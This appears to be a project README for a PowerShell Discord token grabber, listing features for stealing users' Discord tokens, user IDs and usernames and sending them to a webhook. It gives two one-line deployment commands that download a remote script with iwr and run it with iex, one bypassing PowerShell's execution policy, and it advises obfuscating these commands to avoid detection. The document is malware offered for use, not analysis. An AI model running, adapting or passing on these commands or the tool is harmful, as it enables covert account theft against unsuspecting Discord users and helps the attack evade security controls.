A Discord token grabber that exfiltrates tokens to a webhook written in powershell
Table of Contents
- Inbuilt token checker
- All data sent through a webhook
- Provives userID of tokens found
- Provides token type
- Provides the usernames of the tokens stolen
- Gives information on where the tokens stolen are stored
To effectivly deploy this project, choose one of these steps
To avoid detection, the following commands should be Encoded using Obfuscation
$hookurl='';iex((iwr https://raw.githubusercontent.com/TheRedBladeClan/PSGrabber/main/PSGrabber.ps1).content)
powershell.exe -NoProfile -ExecutionPolicy bypass -Command "$hookurl='';iex((iwr https://raw.githubusercontent.com/TheRedBladeClan/PSGrabber/main/PSGrabber.ps1).content)"
- danielbohannon for The obfuscation used in the program